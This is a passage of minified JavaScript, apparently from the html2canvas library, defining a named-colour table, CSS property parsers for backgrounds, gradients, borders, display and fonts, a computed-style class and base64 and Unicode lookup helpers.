DIMGRAY:1768516095,DIMGREY:1768516095,DODGERBLUE:512819199,FIREBRICK:2988581631,FLORALWHITE:4294635775,FORESTGREEN:579543807,FUCHSIA:4278255615,GAINSBORO:3705462015,GHOSTWHITE:4177068031,GOLD:4292280575,GOLDENROD:3668254975,GRAY:2155905279,GREEN:8388863,GREENYELLOW:2919182335,GREY:2155905279,HONEYDEW:4043305215,HOTPINK:4285117695,INDIANRED:3445382399,INDIGO:1258324735,IVORY:4294963455,KHAKI:4041641215,LAVENDER:3873897215,LAVENDERBLUSH:4293981695,LAWNGREEN:2096890111,LEMONCHIFFON:4294626815,LIGHTBLUE:2916673279,LIGHTCORAL:4034953471,LIGHTCYAN:3774873599,LIGHTGOLDENRODYELLOW:4210742015,LIGHTGRAY:3553874943,LIGHTGREEN:2431553791,LIGHTGREY:3553874943,LIGHTPINK:4290167295,LIGHTSALMON:4288707327,LIGHTSEAGREEN:548580095,LIGHTSKYBLUE:2278488831,LIGHTSLATEGRAY:2005441023,LIGHTSLATEGREY:2005441023,LIGHTSTEELBLUE:2965692159,LIGHTYELLOW:4294959359,LIME:16711935,LIMEGREEN:852308735,LINEN:4210091775,MAGENTA:4278255615,MAROON:2147483903,MEDIUMAQUAMARINE:1724754687,MEDIUMBLUE:52735,MEDIUMORCHID:3126187007,MEDIUMPURPLE:2473647103,MEDIUMSEAGREEN:1018393087,MEDIUMSLATEBLUE:2070474495,MEDIUMSPRINGGREEN:16423679,MEDIUMTURQUOISE:1221709055,MEDIUMVIOLETRED:3340076543,MIDNIGHTBLUE:421097727,MINTCREAM:4127193855,MISTYROSE:4293190143,MOCCASIN:4293178879,NAVAJOWHITE:4292783615,NAVY:33023,OLDLACE:4260751103,OLIVE:2155872511,OLIVEDRAB:1804477439,ORANGE:4289003775,ORANGERED:4282712319,ORCHID:3664828159,PALEGOLDENROD:4008225535,PALEGREEN:2566625535,PALETURQUOISE:2951671551,PALEVIOLETRED:3681588223,PAPAYAWHIP:4293907967,PEACHPUFF:4292524543,PERU:3448061951,PINK:4290825215,PLUM:3718307327,POWDERBLUE:2967529215,PURPLE:2147516671,REBECCAPURPLE:1714657791,RED:4278190335,ROSYBROWN:3163525119,ROYALBLUE:1097458175,SADDLEBROWN:2336560127,SALMON:4202722047,SANDYBROWN:4104413439,SEAGREEN:780883967,SEASHELL:4294307583,SIENNA:2689740287,SILVER:3233857791,SKYBLUE:2278484991,SLATEBLUE:1784335871,SLATEGRAY:1887473919,SLATEGREY:1887473919,SNOW:4294638335,SPRINGGREEN:16744447,STEELBLUE:1182971135,TAN:3535047935,TEAL:8421631,THISTLE:3636451583,TOMATO:4284696575,TRANSPARENT:0,TURQUOISE:1088475391,VIOLET:4001558271,WHEAT:4125012991,WHITE:4294967295,WHITESMOKE:4126537215,YELLOW:4294902015,YELLOWGREEN:2597139199},o_={name:"background-clip",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},ms={name:"background-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},Is=function(fe,ce){var ge=Hs_parse(fe,ce[0]),_e=ce[1];return _e&&In(_e)?{color:ge,stop:_e}:{color:ge,stop:null}},Gu=function(fe,ce){var ge=fe[0],_e=fe[fe.length-1];null===ge.stop&&(ge.stop=xo),null===_e.stop&&(_e.stop=Ia);for(var je=[],tt=0,dt=0;dt<fe.length;dt++){var _t=fe[dt].stop;if(null!==_t){var gt=_n(_t,ce);je.push(gt>tt?gt:tt),tt=gt}else je.push(null)}var kt=null;for(dt=0;dt<je.length;dt++){var Lt=je[dt];if(null===Lt)null===kt&&(kt=dt);else if(null!==kt){for(var Ht=dt-kt,Ki=(Lt-je[kt-1])/(Ht+1),Ni=1;Ni<=Ht;Ni++)je[kt+Ni-1]=Ki*Ni;kt=null}}return fe.map(function(Ui,dn){return{color:Ui.color,stop:Math.max(Math.min(1,je[dn]/ce),0)}})},uc=function(fe,ce,ge){var _e="number"==typeof fe?fe:function(fe,ce,ge){var _e=ce/2,je=ge/2,tt=_n(fe[0],ce)-_e,dt=je-_n(fe[1],ge);return(Math.atan2(dt,tt)+2*Math.PI)%(2*Math.PI)}(fe,ce,ge),je=Math.abs(ce*Math.sin(_e))+Math.abs(ge*Math.cos(_e)),tt=ce/2,dt=ge/2,_t=je/2,gt=Math.sin(_e-Math.PI/2)*_t,kt=Math.cos(_e-Math.PI/2)*_t;return[je,tt-kt,tt+kt,dt-gt,dt+gt]},gr=function(fe,ce){return Math.sqrt(fe*fe+ce*ce)},s0=function(fe,ce,ge,_e,je){return[[0,0],[0,ce],[fe,0],[fe,ce]].reduce(function(dt,_t){var Lt=gr(ge-_t[0],_e-_t[1]);return(je?Lt<dt.optimumDistance:Lt>dt.optimumDistance)?{optimumCorner:_t,optimumDistance:Lt}:dt},{optimumDistance:je?1/0:-1/0,optimumCorner:null}).optimumCorner},ju=function(fe,ce){var ge=ds(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&-1!==["top","left","right","bottom"].indexOf(dt.value))return void(ge=$a(je));if(tc(dt))return void(ge=(Bl_parse(fe,dt)+ds(270))%ds(360))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},U2="closest-side",l0="farthest-side",hc="closest-corner",q2="farthest-corner",G2="ellipse",Q2="contain",Ef=function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t?gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"center":return tt.push(Vi),!1;case"top":case"left":return tt.push(xo),!1;case"right":case"bottom":return tt.push(Ia),!1}else if(In(Ht)||ws(Ht))return tt.push(Ht),!1;return Lt},gt):1===_t&&(gt=dt.reduce(function(Lt,Ht){if(tn(Ht))switch(Ht.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case Q2:case U2:return _e=0,!1;case l0:return _e=1,!1;case hc:return _e=2,!1;case"cover":case q2:return _e=3,!1}else if(ws(Ht)||In(Ht))return Array.isArray(_e)||(_e=[]),_e.push(Ht),!1;return Lt},gt)),gt){var kt=Is(fe,dt);je.push(kt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},m0_parse=function(fe,ce){if(22===ce.type){var ge={url:ce.value,type:0};return fe.cache.addImage(ce.value),ge}if(18===ce.type){var _e=wf[ce.name];if(void 0===_e)throw new Error('Attempting to parse an unsupported image function "'+ce.name+'"');return _e(fe,ce.values)}throw new Error("Unsupported image type "+ce.type)};for(var wf={"linear-gradient":function(fe,ce){var ge=ds(180),_e=[];return xs(ce).forEach(function(je,tt){if(0===tt){var dt=je[0];if(20===dt.type&&"to"===dt.value)return void(ge=$a(je));if(tc(dt))return void(ge=Bl_parse(fe,dt))}var _t=Is(fe,je);_e.push(_t)}),{angle:ge,stops:_e,type:1}},"-moz-linear-gradient":ju,"-ms-linear-gradient":ju,"-o-linear-gradient":ju,"-webkit-linear-gradient":ju,"radial-gradient":function(fe,ce){var ge=0,_e=3,je=[],tt=[];return xs(ce).forEach(function(dt,_t){var gt=!0;if(0===_t){var kt=!1;gt=dt.reduce(function(Ht,ui){if(kt)if(tn(ui))switch(ui.value){case"center":return tt.push(Vi),Ht;case"top":case"left":return tt.push(xo),Ht;case"right":case"bottom":return tt.push(Ia),Ht}else(In(ui)||ws(ui))&&tt.push(ui);else if(tn(ui))switch(ui.value){case"circle":return ge=0,!1;case G2:return ge=1,!1;case"at":return kt=!0,!1;case U2:return _e=0,!1;case"cover":case l0:return _e=1,!1;case Q2:case hc:return _e=2,!1;case q2:return _e=3,!1}else if(ws(ui)||In(ui))return Array.isArray(_e)||(_e=[]),_e.push(ui),!1;return Ht},gt)}if(gt){var Lt=Is(fe,dt);je.push(Lt)}}),{size:_e,shape:ge,stops:je,position:tt,type:2}},"-moz-radial-gradient":Ef,"-ms-radial-gradient":Ef,"-o-radial-gradient":Ef,"-webkit-radial-gradient":Ef,"-webkit-gradient":function(fe,ce){var ge=ds(180),_e=[],je=1;return xs(ce).forEach(function(gt,kt){var Lt=gt[0];if(0===kt){if(tn(Lt)&&"linear"===Lt.value)return void(je=1);if(tn(Lt)&&"radial"===Lt.value)return void(je=2)}if(18===Lt.type)if("from"===Lt.name){var Ht=Hs_parse(fe,Lt.values[0]);_e.push({stop:xo,color:Ht})}else if("to"===Lt.name)Ht=Hs_parse(fe,Lt.values[0]),_e.push({stop:Ia,color:Ht});else if("color-stop"===Lt.name){var ui=Lt.values.filter(Wl);if(2===ui.length){Ht=Hs_parse(fe,ui[1]);var Ki=ui[0];ur(Ki)&&_e.push({stop:{type:16,number:100*Ki.number,flags:Ki.flags},color:Ht})}}}),1===je?{angle:(ge+ds(180))%ds(360),stops:_e,type:je}:{size:3,shape:0,stops:_e,position:[],type:je}}},$2={name:"background-image",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce.filter(function(_e){return Wl(_e)&&function r_(fe){return!(20===fe.type&&"none"===fe.value||18===fe.type&&!wf[fe.name])}(_e)}).map(function(_e){return m0_parse(fe,_e)})}},LM={name:"background-origin",initialValue:"border-box",prefix:!1,type:1,parse:function(fe,ce){return ce.map(function(ge){if(tn(ge))switch(ge.value){case"padding-box":return 1;case"content-box":return 2}return 0})}},K2={name:"background-position",initialValue:"0% 0%",type:1,prefix:!1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(In)}).map(n_)}},Qd={name:"background-repeat",initialValue:"repeat",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(tn).map(function(_e){return _e.value}).join(" ")}).map(u0)}},u0=function(fe){switch(fe){case"no-repeat":return 1;case"repeat-x":case"repeat no-repeat":return 2;case"repeat-y":case"no-repeat repeat":return 3;default:return 0}},sa=(()=>{return(fe=sa||(sa={})).AUTO="auto",fe.CONTAIN="contain",fe.COVER="cover",sa;var fe})(),h0={name:"background-size",initialValue:"0",prefix:!1,type:1,parse:function(fe,ce){return xs(ce).map(function(ge){return ge.filter(f0)})}},f0=function(fe){return tn(fe)||In(fe)},If=function(fe){return{name:"border-"+fe+"-color",initialValue:"transparent",prefix:!1,type:3,format:"color"}},p0=If("top"),s_=If("right"),X2=If("bottom"),Rf=If("left"),Qu=function(fe){return{name:"border-radius-"+fe,initialValue:"0 0",prefix:!1,type:1,parse:function(ce,ge){return n_(ge.filter(In))}}},fc=Qu("top-left"),c_=Qu("top-right"),Y2=Qu("bottom-right"),l_=Qu("bottom-left"),Sf=function(fe){return{name:"border-"+fe+"-style",initialValue:"solid",prefix:!1,type:2,parse:function(ce,ge){switch(ge){case"none":return 0;case"dashed":return 2;case"dotted":return 3;case"double":return 4}return 1}}},d_=Sf("top"),Ar=Sf("right"),J2=Sf("bottom"),zM=Sf("left"),$d=function(fe){return{name:"border-"+fe+"-width",initialValue:"0",type:0,prefix:!1,parse:function(ce,ge){return Un(ge)?ge.number:0}}},pc=$d("top"),Z2=$d("right"),m_=$d("bottom"),Nc=$d("left"),us={name:"color",initialValue:"transparent",prefix:!1,type:3,format:"color"},$u={name:"direction",initialValue:"ltr",prefix:!1,type:2,parse:function(fe,ce){return"rtl"===ce?1:0}},Um={name:"display",initialValue:"inline-block",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).reduce(function(ge,_e){return ge|eC(_e.value)},0)}},eC=function(fe){switch(fe){case"block":case"-webkit-box":return 2;case"inline":return 4;case"run-in":return 8;case"flow":return 16;case"flow-root":return 32;case"table":return 64;case"flex":case"-webkit-flex":return 128;case"grid":case"-ms-grid":return 256;case"ruby":return 512;case"subgrid":return 1024;case"list-item":return 2048;case"table-row-group":return 4096;case"table-header-group":return 8192;case"table-footer-group":return 16384;case"table-row":return 32768;case"table-cell":return 65536;case"table-column-group":return 131072;case"table-column":return 262144;case"table-caption":return 524288;case"ruby-base":return 1048576;case"ruby-text":return 2097152;case"ruby-base-container":return 4194304;case"ruby-text-container":return 8388608;case"contents":return 16777216;case"inline-block":return 33554432;case"inline-list-item":return 67108864;case"inline-table":return 134217728;case"inline-flex":return 268435456;case"inline-grid":return 536870912}return 0},Rs={name:"float",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"left":return 1;case"right":return 2;case"inline-start":return 3;case"inline-end":return 4}return 0}},u_={name:"letter-spacing",initialValue:"0",prefix:!1,type:0,parse:function(fe,ce){return 20===ce.type&&"normal"===ce.value?0:17===ce.type||15===ce.type?ce.number:0}},rd=(()=>{return(fe=rd||(rd={})).NORMAL="normal",fe.STRICT="strict",rd;var fe})(),Ua={name:"line-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"strict"===ce?rd.STRICT:rd.NORMAL}},h_={name:"line-height",initialValue:"normal",prefix:!1,type:4},tC=function(fe,ce){return tn(fe)&&"normal"===fe.value?1.2*ce:17===fe.type?ce*fe.number:In(fe)?_n(fe,ce):ce},f_={name:"list-style-image",initialValue:"none",type:0,prefix:!1,parse:function(fe,ce){return 20===ce.type&&"none"===ce.value?null:m0_parse(fe,ce)}},iC={name:"list-style-position",initialValue:"outside",prefix:!1,type:2,parse:function(fe,ce){return"inside"===ce?0:1}},kf={name:"list-style-type",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"disc":return 0;case"circle":return 1;case"square":return 2;case"decimal":return 3;case"cjk-decimal":return 4;case"decimal-leading-zero":return 5;case"lower-roman":return 6;case"upper-roman":return 7;case"lower-greek":return 8;case"lower-alpha":return 9;case"upper-alpha":return 10;case"arabic-indic":return 11;case"armenian":return 12;case"bengali":return 13;case"cambodian":return 14;case"cjk-earthly-branch":return 15;case"cjk-heavenly-stem":return 16;case"cjk-ideographic":return 17;case"devanagari":return 18;case"ethiopic-numeric":return 19;case"georgian":return 20;case"gujarati":return 21;case"gurmukhi":case"hebrew":return 22;case"hiragana":return 23;case"hiragana-iroha":return 24;case"japanese-formal":return 25;case"japanese-informal":return 26;case"kannada":return 27;case"katakana":return 28;case"katakana-iroha":return 29;case"khmer":return 30;case"korean-hangul-formal":return 31;case"korean-hanja-formal":return 32;case"korean-hanja-informal":return 33;case"lao":return 34;case"lower-armenian":return 35;case"malayalam":return 36;case"mongolian":return 37;case"myanmar":return 38;case"oriya":return 39;case"persian":return 40;case"simp-chinese-formal":return 41;case"simp-chinese-informal":return 42;case"tamil":return 43;case"telugu":return 44;case"thai":return 45;case"tibetan":return 46;case"trad-chinese-formal":return 47;case"trad-chinese-informal":return 48;case"upper-armenian":return 49;case"disclosure-open":return 50;case"disclosure-closed":return 51;default:return-1}}},Ku=function(fe){return{name:"margin-"+fe,initialValue:"0",prefix:!1,type:4}},p_=Ku("top"),qm=Ku("right"),bi=Ku("bottom"),Rn=Ku("left"),be={name:"overflow",initialValue:"visible",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"hidden":return 1;case"scroll":return 2;case"clip":return 3;case"auto":return 4;default:return 0}})}},Me={name:"overflow-wrap",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){return"break-word"===ce?"break-word":"normal"}},nr=function(fe){return{name:"padding-"+fe,initialValue:"0",prefix:!1,type:3,format:"length-percentage"}},Pf=nr("top"),Kd=nr("right"),_c=nr("bottom"),Xu=nr("left"),Yu={name:"text-align",initialValue:"left",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"right":return 2;case"center":case"justify":return 1;default:return 0}}},__={name:"position",initialValue:"static",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"relative":return 1;case"absolute":return 2;case"fixed":return 3;case"sticky":return 4}return 0}},_0={name:"text-shadow",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return 1===ce.length&&ls(ce[0],"none")?[]:xs(ce).map(function(ge){for(var _e={color:Oc.TRANSPARENT,offsetX:xo,offsetY:xo,blur:xo},je=0,tt=0;tt<ge.length;tt++){var dt=ge[tt];ws(dt)?(0===je?_e.offsetX=dt:1===je?_e.offsetY=dt:_e.blur=dt,je++):_e.color=Hs_parse(fe,dt)}return _e})}},aC={name:"text-transform",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"uppercase":return 2;case"lowercase":return 1;case"capitalize":return 3}return 0}},g0={name:"transform",initialValue:"none",prefix:!0,type:0,parse:function(fe,ce){if(20===ce.type&&"none"===ce.value)return null;if(18===ce.type){var ge=C0[ce.name];if(void 0===ge)throw new Error('Attempting to parse an unsupported transform function "'+ce.name+'"');return ge(ce.values)}return null}},C0={matrix:function(fe){var ce=fe.filter(function(ge){return 17===ge.type}).map(function(ge){return ge.number});return 6===ce.length?ce:null},matrix3d:function(fe){var ce=fe.filter(function(gt){return 17===gt.type}).map(function(gt){return gt.number});return 16===ce.length?[ce[0],ce[1],ce[4],ce[5],ce[12],ce[13]]:null}},sd={type:16,number:50,flags:4},hl=[sd,sd],y0={name:"transform-origin",initialValue:"50% 50%",prefix:!0,type:1,parse:function(fe,ce){var ge=ce.filter(In);return 2!==ge.length?hl:[ge[0],ge[1]]}},b0={name:"visible",initialValue:"none",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"hidden":return 1;case"collapse":return 2;default:return 0}}},Gm=(()=>{return(fe=Gm||(Gm={})).NORMAL="normal",fe.BREAK_ALL="break-all",fe.KEEP_ALL="keep-all",Gm;var fe})(),nC={name:"word-break",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"break-all":return Gm.BREAK_ALL;case"keep-all":return Gm.KEEP_ALL;default:return Gm.NORMAL}}},g_={name:"z-index",initialValue:"auto",prefix:!1,type:0,parse:function(fe,ce){if(20===ce.type)return{auto:!0,order:0};if(ur(ce))return{auto:!1,order:ce.number};throw new Error("Invalid z-index number parsed")}},Of={name:"time",parse:function(fe,ce){if(15===ce.type)switch(ce.unit.toLowerCase()){case"s":return 1e3*ce.number;case"ms":return ce.number}throw new Error("Unsupported time type")}},cd={name:"opacity",initialValue:"1",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:1}},C_={name:"text-decoration-color",initialValue:"transparent",prefix:!1,type:3,format:"color"},Lc={name:"text-decoration-line",initialValue:"none",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){switch(ge.value){case"underline":return 1;case"overline":return 2;case"line-through":return 3;case"none":return 4}return 0}).filter(function(ge){return 0!==ge})}},M0={name:"font-family",initialValue:"",prefix:!1,type:1,parse:function(fe,ce){var ge=[],_e=[];return ce.forEach(function(je){switch(je.type){case 20:case 0:ge.push(je.value);break;case 17:ge.push(je.number.toString());break;case 4:_e.push(ge.join(" ")),ge.length=0}}),ge.length&&_e.push(ge.join(" ")),_e.map(function(je){return-1===je.indexOf(" ")?je:"'"+je+"'"})}},y_={name:"font-size",initialValue:"0",prefix:!1,type:3,format:"length"},b_={name:"font-weight",initialValue:"normal",type:0,prefix:!1,parse:function(fe,ce){return ur(ce)?ce.number:tn(ce)&&"bold"===ce.value?700:400}},v0={name:"font-variant",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return ce.filter(tn).map(function(ge){return ge.value})}},A0={name:"font-style",initialValue:"normal",prefix:!1,type:2,parse:function(fe,ce){switch(ce){case"oblique":return"oblique";case"italic":return"italic";default:return"normal"}}},Tr=function(fe,ce){return 0!=(fe&ce)},M_={name:"content",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){if(0===ce.length)return[];var ge=ce[0];return 20===ge.type&&"none"===ge.value?[]:ce}},oC={name:"counter-increment",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return null;var ge=ce[0];if(20===ge.type&&"none"===ge.value)return null;for(var _e=[],je=ce.filter(Bm),tt=0;tt<je.length;tt++){var dt=je[tt],_t=je[tt+1];if(20===dt.type){var gt=_t&&ur(_t)?_t.number:1;_e.push({counter:dt.value,increment:gt})}}return _e}},rC={name:"counter-reset",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return[];for(var ge=[],_e=ce.filter(Bm),je=0;je<_e.length;je++){var tt=_e[je],dt=_e[je+1];if(tn(tt)&&"none"!==tt.value){var _t=dt&&ur(dt)?dt.number:0;ge.push({counter:tt.value,reset:_t})}}return ge}},Ss={name:"duration",initialValue:"0s",prefix:!1,type:1,parse:function(fe,ce){return ce.filter(Un).map(function(ge){return Of.parse(fe,ge)})}},fl={name:"quotes",initialValue:"none",prefix:!0,type:1,parse:function(fe,ce){if(0===ce.length)return null;var ge=ce[0];if(20===ge.type&&"none"===ge.value)return null;var _e=[],je=ce.filter(zl);if(je.length%2!=0)return null;for(var tt=0;tt<je.length;tt+=2)_e.push({open:je[tt].value,close:je[tt+1].value});return _e}},or=function(fe,ce,ge){if(!fe)return"";var _e=fe[Math.min(ce,fe.length-1)];return _e?ge?_e.open:_e.close:""},fi={name:"box-shadow",initialValue:"none",type:1,prefix:!1,parse:function(fe,ce){return 1===ce.length&&ls(ce[0],"none")?[]:xs(ce).map(function(ge){for(var _e={color:255,offsetX:xo,offsetY:xo,blur:xo,spread:xo,inset:!1},je=0,tt=0;tt<ge.length;tt++){var dt=ge[tt];ls(dt,"inset")?_e.inset=!0:ws(dt)?(0===je?_e.offsetX=dt:1===je?_e.offsetY=dt:2===je?_e.blur=dt:_e.spread=dt,je++):_e.color=Hs_parse(fe,dt)}return _e})}},sC={name:"paint-order",initialValue:"normal",prefix:!1,type:1,parse:function(fe,ce){var _e=[];return ce.filter(tn).forEach(function(je){switch(je.value){case"stroke":_e.push(1);break;case"fill":_e.push(0);break;case"markers":_e.push(2)}}),[0,1,2].forEach(function(je){-1===_e.indexOf(je)&&_e.push(je)}),_e}},ln={name:"-webkit-text-stroke-color",initialValue:"currentcolor",prefix:!1,type:3,format:"color"},cC={name:"-webkit-text-stroke-width",initialValue:"0",type:0,prefix:!1,parse:function(fe,ce){return Un(ce)?ce.number:0}},lC=function(){function fe(ce,ge){var _e,je;this.animationDuration=ji(ce,Ss,ge.animationDuration),this.backgroundClip=ji(ce,o_,ge.backgroundClip),this.backgroundColor=ji(ce,ms,ge.backgroundColor),this.backgroundImage=ji(ce,$2,ge.backgroundImage),this.backgroundOrigin=ji(ce,LM,ge.backgroundOrigin),this.backgroundPosition=ji(ce,K2,ge.backgroundPosition),this.backgroundRepeat=ji(ce,Qd,ge.backgroundRepeat),this.backgroundSize=ji(ce,h0,ge.backgroundSize),this.borderTopColor=ji(ce,p0,ge.borderTopColor),this.borderRightColor=ji(ce,s_,ge.borderRightColor),this.borderBottomColor=ji(ce,X2,ge.borderBottomColor),this.borderLeftColor=ji(ce,Rf,ge.borderLeftColor),this.borderTopLeftRadius=ji(ce,fc,ge.borderTopLeftRadius),this.borderTopRightRadius=ji(ce,c_,ge.borderTopRightRadius),this.borderBottomRightRadius=ji(ce,Y2,ge.borderBottomRightRadius),this.borderBottomLeftRadius=ji(ce,l_,ge.borderBottomLeftRadius),this.borderTopStyle=ji(ce,d_,ge.borderTopStyle),this.borderRightStyle=ji(ce,Ar,ge.borderRightStyle),this.borderBottomStyle=ji(ce,J2,ge.borderBottomStyle),this.borderLeftStyle=ji(ce,zM,ge.borderLeftStyle),this.borderTopWidth=ji(ce,pc,ge.borderTopWidth),this.borderRightWidth=ji(ce,Z2,ge.borderRightWidth),this.borderBottomWidth=ji(ce,m_,ge.borderBottomWidth),this.borderLeftWidth=ji(ce,Nc,ge.borderLeftWidth),this.boxShadow=ji(ce,fi,ge.boxShadow),this.color=ji(ce,us,ge.color),this.direction=ji(ce,$u,ge.direction),this.display=ji(ce,Um,ge.display),this.float=ji(ce,Rs,ge.cssFloat),this.fontFamily=ji(ce,M0,ge.fontFamily),this.fontSize=ji(ce,y_,ge.fontSize),this.fontStyle=ji(ce,A0,ge.fontStyle),this.fontVariant=ji(ce,v0,ge.fontVariant),this.fontWeight=ji(ce,b_,ge.fontWeight),this.letterSpacing=ji(ce,u_,ge.letterSpacing),this.lineBreak=ji(ce,Ua,ge.lineBreak),this.lineHeight=ji(ce,h_,ge.lineHeight),this.listStyleImage=ji(ce,f_,ge.listStyleImage),this.listStylePosition=ji(ce,iC,ge.listStylePosition),this.listStyleType=ji(ce,kf,ge.listStyleType),this.marginTop=ji(ce,p_,ge.marginTop),this.marginRight=ji(ce,qm,ge.marginRight),this.marginBottom=ji(ce,bi,ge.marginBottom),this.marginLeft=ji(ce,Rn,ge.marginLeft),this.opacity=ji(ce,cd,ge.opacity);var tt=ji(ce,be,ge.overflow);this.overflowX=tt[0],this.overflowY=tt[tt.length>1?1:0],this.overflowWrap=ji(ce,Me,ge.overflowWrap),this.paddingTop=ji(ce,Pf,ge.paddingTop),this.paddingRight=ji(ce,Kd,ge.paddingRight),this.paddingBottom=ji(ce,_c,ge.paddingBottom),this.paddingLeft=ji(ce,Xu,ge.paddingLeft),this.paintOrder=ji(ce,sC,ge.paintOrder),this.position=ji(ce,__,ge.position),this.textAlign=ji(ce,Yu,ge.textAlign),this.textDecorationColor=ji(ce,C_,null!==(_e=ge.textDecorationColor)&&void 0!==_e?_e:ge.color),this.textDecorationLine=ji(ce,Lc,null!==(je=ge.textDecorationLine)&&void 0!==je?je:ge.textDecoration),this.textShadow=ji(ce,_0,ge.textShadow),this.textTransform=ji(ce,aC,ge.textTransform),this.transform=ji(ce,g0,ge.transform),this.transformOrigin=ji(ce,y0,ge.transformOrigin),this.visibility=ji(ce,b0,ge.visibility),this.webkitTextStrokeColor=ji(ce,ln,ge.webkitTextStrokeColor),this.webkitTextStrokeWidth=ji(ce,cC,ge.webkitTextStrokeWidth),this.wordBreak=ji(ce,nC,ge.wordBreak),this.zIndex=ji(ce,g_,ge.zIndex)}return fe.prototype.isVisible=function(){return this.display>0&&this.opacity>0&&0===this.visibility},fe.prototype.isTransparent=function(){return Pc(this.backgroundColor)},fe.prototype.isTransformed=function(){return null!==this.transform},fe.prototype.isPositioned=function(){return 0!==this.position},fe.prototype.isPositionedWithZIndex=function(){return this.isPositioned()&&!this.zIndex.auto},fe.prototype.isFloating=function(){return 0!==this.float},fe.prototype.isInlineLevel=function(){return Tr(this.display,4)||Tr(this.display,33554432)||Tr(this.display,268435456)||Tr(this.display,536870912)||Tr(this.display,67108864)||Tr(this.display,134217728)},fe}(),dC=function fe(ce,ge){this.content=ji(ce,M_,ge.content),this.quotes=ji(ce,fl,ge.quotes)},Ju=function fe(ce,ge){this.counterIncrement=ji(ce,oC,ge.counterIncrement),this.counterReset=ji(ce,rC,ge.counterReset)},ji=function(fe,ce,ge){var _e=new Ot,je=null!=ge?ge.toString():ce.initialValue;_e.write(je);var tt=new Fr(_e.read());switch(ce.type){case 2:var dt=tt.parseComponentValue();return ce.parse(fe,tn(dt)?dt.value:ce.initialValue);case 0:return ce.parse(fe,tt.parseComponentValue());case 1:return ce.parse(fe,tt.parseComponentValues());case 4:return tt.parseComponentValue();case 3:switch(ce.format){case"angle":return Bl_parse(fe,tt.parseComponentValue());case"color":return Hs_parse(fe,tt.parseComponentValue());case"image":return m0_parse(fe,tt.parseComponentValue());case"length":var _t=tt.parseComponentValue();return ws(_t)?_t:xo;case"length-percentage":var gt=tt.parseComponentValue();return In(gt)?gt:xo;case"time":return Of.parse(fe,tt.parseComponentValue())}}},Nf=function(fe,ce){var ge=function(fe){switch(fe.getAttribute("data-html2canvas-debug")){case"all":return 1;case"clone":return 2;case"parse":return 3;case"render":return 4;default:return 0}}(fe);return 1===ge||ce===ge},pl=function fe(ce,ge){this.context=ce,this.textNodes=[],this.elements=[],this.flags=0,Nf(ge,3),this.styles=new lC(ce,window.getComputedStyle(ge,null)),Hi(ge)&&(this.styles.animationDuration.some(function(_e){return _e>0})&&(ge.style.animationDuration="0s"),null!==this.styles.transform&&(ge.style.transform="none")),this.bounds=Q(this.context,ge),Nf(ge,4)&&(this.flags|=16)},ld="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",eh="undefined"==typeof Uint8Array?[]:new Uint8Array(256),ks=0;ks<ld.length;ks++)eh[ld.charCodeAt(ks)]=ks;for(var E_=function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint16Array(Array.prototype.slice.call(fe,ce,ge))},gl=function(){function fe(ce,ge,_e,je,tt,dt){this.initialValue=ce,this.errorValue=ge,this.highStart=_e,this.highValueIndex=je,this.index=tt,this.data=dt}return fe.prototype.get=function(ce){var ge;if(ce>=0){if(ce<55296||ce>56319&&ce<=65535)return this.data[ge=((ge=this.index[ce>>5])<<2)+(31&ce)];if(ce<=65535)return this.data[ge=((ge=this.index[2048+(ce-55296>>5)])<<2)+(31&ce)];if(ce<this.highStart)return ge=this.index[ge=2080+(ce>>11)],this.data[ge=((ge=this.index[ge+=ce>>5&63])<<2)+(31&ce)];if(ce<=1114111)return this.data[this.highValueIndex]}return this.errorValue},fe}(),R0="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ah="undefined"==typeof Uint8Array?[]:new Uint8Array(256),$m=0;$m<R0.length;$m++)ah[R0.charCodeAt($m)]=$m;var Zd=8,md=9,nh=11,Xm=12,fC=function(){for(var fe=[],ce=0;ce<arguments.length;ce++)fe[ce]=arguments[ce];if(String.fromCodePoint)return String.fromCodePoint.apply(String,fe);var ge=fe.length;if(!ge)return"";for(var _e=[],je=-1,tt="";++je<ge;){var dt=fe[je];dt<=65535?_e.push(dt):_e.push(55296+((dt-=65536)>>10),dt%1024+56320),(je+1===ge||_e.length>16384)&&(tt+=String.fromCharCode.apply(String,_e),_e.length=0)}return tt},ba=function(fe,ce){var 